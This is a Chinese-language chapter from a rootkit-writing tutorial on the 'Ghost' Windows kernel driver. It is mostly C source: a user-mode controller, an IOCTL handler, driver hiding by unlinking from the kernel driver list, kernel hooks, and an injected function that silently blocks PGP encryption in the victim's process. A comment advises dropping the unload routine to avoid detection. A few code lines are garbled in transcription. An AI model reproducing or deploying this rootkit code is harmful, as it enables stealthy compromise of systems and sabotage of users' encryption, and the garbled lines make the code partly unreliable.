第五章:I/O处理
概述
本章想你介绍I/O处理系统。I/O处理,命名管道,和共享内存这些可以用来有效的实现内核模式和用户模式进程间的通信。在这三种方式中,I/O处理可能是最容易理解和实现的了。因为我们的rootkit 是作为一个设备驱动程序加载到内核内存中执行,控制应用程序通常被加载到用户内存,因此就需要这种通信方式。除了各自的内存区域外,内核和用户模式进程通常使用各自的堆栈。这就有效的阻止了利用函数传递参数即使你可以从一个交替内存区域标识一个函数的位置。
本章包括如下内容:
DeviceIoControl函数
一个基本的rootkit控制应用程序
基本的I/O处理在rootkit中的应用
一个基本的rootkit命令
测试一个基本的rootkit命令
使用DeviceIoControl
Rootkit通常作为设备驱动程序来执行,通常需要与外部用户层应用程序通信的能力。这些外部应用程序使用不同的堆栈和不同的内存空间;他们可以使用不同的函数并在不同的权限级别下操作。在驱动程序和应用程序间实现通信必须通过一个不被上述因素影响的通道来实现。这个通信通道由DeviceIoControl函数提供。图5-1所示基本I/O控制模型。
图5-1
本章这个详细的例子将为rootkit增加一个开/关转换。 这个开/关转换将由一个标准的Windows控制台程序控制,并通过DeviceIoControl与rootkit进行通讯。在原始的PGP加密函数前在注入函数(added in Chapter 4)被调用时将需要DeviceIoControl。这样可以使注入函数检测开/关转换状态从而确定允许进程还是封锁进程。
这个函数功能需要通过创建三个新文件和修改四个已有文件来控制rootkit本地执行。
新文件如下:
Controller.c
IoManager.c
IoManager.h
下面是要修改的文件:
Ghost.c
Ghost.c
injectManager.c
SOURCES
控制台应用程序
应用程序用来控制rootkit,简单来说就是需要接受一个开或关的命令并将命令传送给rootkit。这是通过rootkit打开已发布设备驱动并通过DeviceIoControl来发送一条指令来完成的。
代码如下节所示。
Controller.c
文件Controller.c接受一个开或关的命令并发送GHOST_ON或GHOST_OFF给在GHOST_DEVICE_OPEN_NAME中所找到的设备驱动。这些定义已经被增加到一个新文件IoManager.h中。这个新文件可以被任何需要与rootkit通讯的应用程序包括:
// Controller
// Copyright Ric Vieler, 2006
// Send an on/off command to MyDeviceDriver
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include "IoManager.h"
void main(int argc, char *argv[])
{
HANDLE deviceHandle;
GHOST_IOCTLDATA control = { 0 };
ULONG status = 0;
if(( argc < 2 ) || ((stricmp(argv[1],"on") != 0)) && ((stricmp(argv[1],"off") !=
0)))
{
printf ("Use Controller on\n");
printf ("or Controller off\n");
return;
}
deviceHandle = CreateFile( GHOST_DEVICE_OPEN_NAME,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (deviceHandle == INVALID_HANDLE_VALUE)
{
printf ("Could not find MyDeviceDriver.\n");
return;
}
if(stricmp(argv[1],"on") == 0)
control.command = GHOST_ON;
else
control.command = GHOST_OFF;
if( DeviceIoControl(deviceHandle,
GHOST_ON_OFF_COMMAND,
&control,
sizeof(control), // input
(PVOID)&control,
sizeof(control), // output
&status,
NULL ) )
printf ("MyDeviceDriver %s.\n", control.command == GHOST_ON ? "on" : "off" );
else
printf ("DeviceIoControl failed.\n");
CloseHandle(deviceHandle);
}
IoManager.h
文件Controller.h提供了rootkit和控制程序所需要的函数定义。用来区分不止一个程序使用的单一文件,在别处定义一个关键字,_GHOST_ROOTKIT_。rootkit必须定义这个关键字,同时控制程序则不准。这样允许rootkit和控制程序在不需要控制程序知道任何rootkit内部结构的前提下来共享I/O通讯定义:
// Copyright Ric Vieler, 2006
// Definitions for Ghost IO control
#ifndef _GHOST_IO_H_
#define _GHOST_IO_H_
// Use CreateFile( GHOST_DEVICE_OPEN_NAME,,, externally
// Use GHOST_DEVICE_CREATE_NAME internally to create device
// Use GHOST_DEVICE_LINK_NAME internally to create device link
#define GHOST_DEVICE_CREATE_NAME L"\\Device\\MyDeviceDriver"
#define GHOST_DEVICE_LINK_NAME L"\\DosDevices\\MyDeviceDriver"
#define GHOST_DEVICE_OPEN_NAME "\\\\.\\MyDeviceDriver"
// Set command = GHOST_ON or GHOST_OFF for GHOST_ON_OFF_COMMAND
// Get command = GHOST_ON or GHOST_OFF for GHOST_STATUS_COMMAND
typedef struct
{
Int command;
} GHOST_IOCTLDATA;
// definitions from ntddk.h
// (these won't be defined in user mode apps)
#ifndef CTL_CODE
#define CTL_CODE( DeviceType, Function, Method, Access ) ( \
((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
)
#endif
#ifndef FILE_DEVICE_UNKNOWN
#define FILE_DEVICE_UNKNOWN 0x00000022
#endif
#ifndef METHOD_BUFFERED
#define METHOD_BUFFERED 0
#endif
#ifndef FILE_ANY_ACCESS
#define FILE_ANY_ACCESS 0
#endif
// Use these to command the rootkit!
#define GHOST_ON_OFF_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED,
FILE_ANY_ACCESS)
#define GHOST_STATUS_COMMAND CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED,
FILE_ANY_ACCESS)
#define GHOST_OFF 0
#define GHOST_ON 1
// Internal functions
#ifdef _GHOST_ROOTKIT_
NTSTATUS OnDeviceControl( PFILE_OBJECT FileObject, BOOLEAN Wait,
PVOID InputBuffer, ULONG InputBufferLength,
PVOID OutputBuffer, ULONG OutputBufferLength,
ULONG IoControlCode, PIO_STATU***LOCK IoStatus,
PDEVICE_OBJECT DeviceObject );
NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp );
#endif
#endif
buildController.bat
如同SCMLoader.c和SCMUnloader.c的情况一样,Controller.c可以使用如下命令或一个方便的批处理文件来编译完成:
cl -nologo -W3 -O2 Controller.c /link /NOLOGO user32.lib advapi32.lib
设备驱动内部的IO处理
在编译完Controller.c后,可以使用Controller.exe来向rootkit发送开或关的命令。然而,需要增强rootkit来处理这些命令。为了达到这一目的Ghost.c、Ghost.h、injectManager.c和 SOURCES需要被修改,并且IoManager.c需要被创建。
对Ghost.h文件进行如下修改:
// Flag for IoManager.h
#define _GHOST_ROOTKIT_
对Ghost.c进行如下修改:
#include "IoManager.h"
包含这个文件后,与Controller.c文件所包含的一样,这是为了提供一直的通讯定义。Ghost.c文件也需要这个文件中的两个函数原型OnDeviceControl和OnDispatch位于IoManager.h文件末端,因此在Ghost.h中定义_GHOST_ROOTKIT_。
// Global state data
BOOL allowEncryption = TRUE;
增加这个全局变量来标记加密处理的开/关状态。
VOID OnUnload( IN PDRIVER_OBJECT theDriverObject )
{
UNICODE_STRING deviceLink = { 0 };
// remove device controller
RtlInitUnicodeString( &deviceLink, GHOST_DEVICE_LINK_NAME );
IoDeleteSymbolicLink( &deviceLink );
IoDeleteDevice( theDriverObject->DeviceObject );
DbgPrint("comint32: Device controller removed.");
// Unhook any hooked functions and return the Memory Descriptor List
if( NewSystemCallTable )
{
UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection );
MmUnmapLockedPages( NewSystemCallTable, pMyMDL );
IoFreeMdl( pMyMDL );
}
DbgPrint("comint32: Hooks removed.");
}
OnUnload被更改来解除链接并删除在DriverEntry中创建的设备驱动。
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING
theRegistryPath )
{
DRIVER_DATA* driverData;
UNICODE_STRING deviceName = { 0 };
UNICODE_STRING deviceLink = { 0 };
PDEVICE_OBJECT pDeviceController;
// Get the operating system version
PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );
// Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
// Major = 5: Windows Server 2003, Windows XP or Windows 2000
// Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
// Minor = 1: Windows XP
// Minor = 2: Windows Server 2003 if ( majorVersion == 5 && minorVersion == 2 )
{
DbgPrint("comint32: Running on Windows 2003");
}
else if ( majorVersion == 5 && minorVersion == 1 )
{
DbgPrint("comint32: Running on Windows XP");
}
else if ( majorVersion == 5 && minorVersion == 0 )
{
DbgPrint("comint32: Running on Windows 2000");
}
else if ( majorVersion == 4 && minorVersion == 0 )
{
DbgPrint("comint32: Running on Windows NT 4.0");
}
else
{
DbgPrint("comint32: Running on unknown system");
}
// Hide this driver
driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
if( driverData != NULL )
{
// unlink this driver entry from the driver list
*((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
}
// Configure the controller connection
if( !NT_SUCCESS( Configure() ) )
{
DbgPrint("comint32: Configure failed!\n");
return STATUS_UNSUCCESSFUL;
}
// Add kernel hooks
if( !NT_SUCCESS( HookKernel() ) )
{
DbgPrint("comint32: HookKernel failed!\n");
return STATUS_UNSUCCESSFUL;
}
// Assign device controller
RtlInitUnicodeString( &deviceName, GHOST_DEVICE_CREATE_NAME );
IoCreateDevice( pDriverObject,
0,
&deviceName,
FILE_DEVICE_UNKNOWN,
0,
FALSE,
&pDeviceController );
RtlInitUnicodeString( &deviceLink, GHOST_DEVICE_LINK_NAME );
IoCreateSymbolicLink( &deviceLink, &deviceName );
pDriverObject->MajorFunction[IRP_MJ_CREATE] =
pDriverObject->MajorFunction[IRP_MJ_CLOSE] =
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = OnDispatch;
// Comment out in free build to avoid detection
pDriverObject->DriverUnload = OnUnload;
return STATUS_SUCCESS;
}
对DriverEntry做几处更改。第一个是增加两个UNICODE_STRINGs和一个PDEVICE_OBJECT。他们是用来创建向外部应用程序发送命令的控制设备驱动。IoCreateDevice创建实际设备驱动,然而IoCreateSymbolicLink使得驱动可以通过使用GHOST_DEVICE_OPEN_NAME来访问。最后,三个MajorFunctions被挂钩以便Ghost可以处理指向重新创建的驱动程序的IRP_MJ_CREATE、IRP_MJ_CLOSE和IRP_MJ_DEVICE_CONTROL命令。这是只有IRP_MJ_DEVICE_CONTROL将被处理。挂钩IRP_MJ_CREATE、IRP_MJ_CLOSE简单的演示了通过允许未处理的命令来“穿过”设备驱动处理程序来挂钩任何MajorFunction的能力。
IoManager.c
通过增加IoManager.c文件来处理DriverEntry中被请求的I/O命令;分别是IRP_MJ_CREATE、IRP_MJ_CLOSE和IRP_MJ_DEVICE_CONTROL。在IoManager.c的迭代中,只有IRP_MJ_DEVICE_CONTROL被处理;IRP_MJ_CREATE和IRP_MJ_CLOSE只是为了演示怎样处理无句柄I/O而增加的:
// IoManager
// Copyright Ric Vieler, 2006
// Process remote IO
#include "ntddk.h"
#include "Ghost.h"
#include "IoManager.h"
extern BOOL allowEncryption;
// Process commands from external applications
NTSTATUS OnDeviceControl( PFILE_OBJECT FileObject, BOOLEAN Wait,
PVOID InputBuffer, ULONG InputBufferLength,
PVOID OutputBuffer, ULONG OutputBufferLength,
ULONG IoControlCode, PIO_STATU***LOCK IoStatus,
PDEVICE_OBJECT DeviceObject )
{
GHOST_IOCTLDATA* pControlData;
IoStatus->Status = STATUS_SUCCESS;
IoStatus->Information = 0;
switch ( IoControlCode )
{
case GHOST_ON_OFF_COMMAND:
if(InputBufferLength >= sizeof(GHOST_IOCTLDATA))
{
pControlData = (GHOST_IOCTLDATA*)InputBuffer;
if(pControlData->command == GHOST_ON)
{
// block PGP encryption
allowEncryption = FALSE;
DbgPrint (("comint32: blocking encryption"));
}
else
{
// allow PGP encryption
allowEncryption = TRUE;
DbgPrint (("comint32: allowing encryption"));
}
}
return IoStatus->Status;
case GHOST_STATUS_COMMAND:
if(OutputBufferLength >= sizeof(GHOST_IOCTLDATA))
{
pControlData = (GHOST_IOCTLDATA*)OutputBuffer;
if(allowEncryption == TRUE)
pControlData->command = GHOST_OFF;
else
pControlData->command = GHOST_ON;
}
IoStatus->Information = sizeof(GHOST_IOCTLDATA);
return IoStatus->Status;
default:
IoStatus->Information = 0;
IoStatus->Status = STATUS_NOT_SUPPORTED;
return IoStatus->Status;
}
return STATUS_SUCCESS;
}
// Process IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL
NTSTATUS OnDispatch( PDEVICE_OBJECT DeviceObject, PIRP Irp )
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS status;
// go ahead and set the request up as successful
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
// Get the IRP stack
irpStack = IoGetCurrentIrpStackLocation (Irp);
// Get the buffers
inputBuffer = Irp->AssociatedIrp.SystemBuffer;
inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBuffer = Irp->AssociatedIrp.SystemBuffer;
outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
// Get the control code
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
switch (irpStack->MajorFunction)
{
case IRP_MJ_DEVICE_CONTROL:
status = OnDeviceControl( irpStack->FileObject, TRUE,
inputBuffer, inputBufferLength,
outputBuffer, outputBufferLength,
ioControlCode, &Irp->IoStatus, DeviceObject );
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return status;
}
OnDispatch处理设备I/O并传递设备驱动控制命令给OnDeviceControl。OnDeviceControl处理GHOST_ON_OFF_COMMAND和GHOST_STATUS_COMMAND命令并为其他处理返回STATUS_NOT_SUPPORTED。GHOST_ON_OFF_COMMAND已经解释过了。GHOST_STATUS_COMMAND是一个命令,将被从被从注入的加密前函数发送到确定PGP编码是否应该被分块。
SOURCES
和所有新被添加到rootkit中的文件一样,IoManager.c也要被添加到SOURCES中。
TARGETNAME=comint32
TARGETPATH=OBJ
TARGETTYPE=DRIVER
SOURCES=Ghost.c\
fileManager.c\
IoManager.c\
hookManager.c\
configManager.c
最后,这是增加到被注入函数的代码,增加beforeEncode到injectManager.c中:
DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData
)
{
void* contextPtr = (void*)stack[1];
PGPOptionList* optionListPtr = (PGPOptionList*)stack[2];
DWORD dwRet = (DWORD)TRUE;
int index;
int inputType = 0;
void* lpBuffer;
DWORD dwInBufferLen = 0;
PGPOption* currentOption = optionListPtr->options;
PFLFileSpec* fileSpec;
HANDLE deviceHandle;
GHOST_IOCTLDATA control = { 0 };
ULONG status = 0;
// Look at the options in the option list
for( index = 0; index < optionListPtr->numOptions; index++)
{
if( currentOption->type == 1 )
{
// File Input
inputType = 1;
fileSpec = (PFLFileSpec*)currentOption->value;
lpBuffer = fileSpec->data;
dwInBufferLen = (DWORD)pCallData->plstrlenA((LPCSTR)(lpBuffer));
break;
}
else if( currentOption->type == 2 )
{
// Buffer Input
inputType = 2;
lpBuffer = (void*)currentOption->value;
dwInBufferLen = (DWORD)currentOption->valueSize;
break;
}
currentOption++;
}
// Process buffer or file before encryption
if(( inputType == 1 || inputType == 2 ) && ( dwInBufferLen > 0 ))
{
deviceHandle = pCallData->pCreateFileA( pCallData->deviceString,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (deviceHandle != INVALID_HANDLE_VALUE)
{
if( pCallData->pDeviceIoControl( deviceHandle,
GHOST_STATUS_COMMAND,
&control,
sizeof(control), // input
(PVOID)&control,
sizeof(control), // output
&status,
NULL ) )
{
if(control.command == GHOST_ON)
{
// blocking encryption
dwRet = (DWORD)FALSE;
*callbackReturn = PGP_BAD_API;
pCallData->pOutputDebugStringA(pCallData->denyString);
}
else
{
pCallData->pOutputDebugStringA(pCallData->allowString);
}
}
pCallData->pCloseHandle(deviceHandle);
}
}
return dwRet;
}
增加的beforeEncode应该看起来很熟悉,因为这个代码非常像Controller.c中使用过的。唯一的不同是这个命令是发送给设备控制程序的并且从结果变化上看代码是在一个被注入函数的内部被执行的。
被注入函数程序设计
现在应该是指出应用程序设计和被注入函数设计的不同之处的时候了。如果你仔细的看过beforeEncode,你将注意到其中没有库函数调用。这是因为被注入函数没有通过基本应用加载库的概念。Ghost通过使用ZwMapViewOfSection来查找所需函数的地址并将这些地址传递给IN_PROCESS_DATA结构中的被注入函数的方法来避免这个问题。不幸的是,这个函数指向IN_PROCESS_DATA附近将不能使用被注入函数中定义的局部变量,因此必须通过传值来传递函数,或者通过传递地址,这个地址必须在IN_PROCESS_DATA结构中传递。
测试I/O控制
为了测试开发到现在的所有功能,你需要通过Checked DDK命令提示符编译第五章的Ghost 。SCMUnloader.exe、SCMLoader.exe和Controller.exe也同样需要编译构建。另外,你需要PGP版本9,虽然如果修正SDK动态链接库名字并将加密前函数样式与你的rootkit版本统一。
复制SCMUnloader、SCMLoader、Controller和Chapter05Ghost\objchk\i386\comint32.sys 文件到C:\目录下。
执行DebugView来监视 rootkit。
如果rootkit之前被加载过,你将需要运行SCMUnloader来卸载已存在的rootkit。这是因为SCMLoader允许一个注册条目告诉运行中的操作系统加载,但是不会开始运行rootkit。
加载并运行rootkit。根据DebugView 的记录来修正一些错误的情况直到rootkit成功加载并运行。
从PGP系统托盘图标选择打开PGP Desktop。如图5-2所示。
在PGP desktop界面中选择File=>New=>PGP Zip。在PGP Zip窗口中选择Add Recipients按钮。如图5-3所示选择一个收件人。
从Recipient Selection对话框中选择任意一个收件人并点击OK。这样将返回到PGP Zip窗口。拖放任意文件到PGP Zip窗口的下部界面并点击Save按钮。如图5-4对话框所示保存PGP Zip。
使用由对话框提供的默认文件名保存并再次点击Save。最后一步,PGP desktop将要求输入解密文档时所需要的passphrase(通过短语)。输入你的passphrase(通过短语)来启动加密程序。如图5-5所示输入一个PGP passphrase(通过短语)。
如果rootkit分块进行加密将出现一个错误信息,通常是一个DLL不匹配信息。拿PGP版本9来说,这个错误消息是“Unable to save(无法保存)(library version too old or too new(库版本太旧或太新))”如图5-6所示PGP加密失败。
现在在Controller.exe所在目录输入命令“controller off”。你将在命令提示符中看到返回信息“MyDeviceDriver off”并在DebugView中看到“comint32: allowing encryption”。
关闭PGP desktop。
现在尝试相同的早期加密形式。被选择文件将被加密保存。
总结
我们现在拥有了具有如下功能的rootkit:
隐藏设备驱动程序条目
隐藏配置文件
挂钩操作系统内核
挂钩操作系统加载进程中的被选进程
从用户模式应用程序发送进程指令
通过对I/O处理的基本了解,你现在可以开始准备解决通讯和驱动过滤。通讯功能可以使rootkit与远程控制程序连接,同时驱动过滤可以使rootkit将自身注入到操作系统底层。第六章包含底层通讯,第七章介绍驱动过滤。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课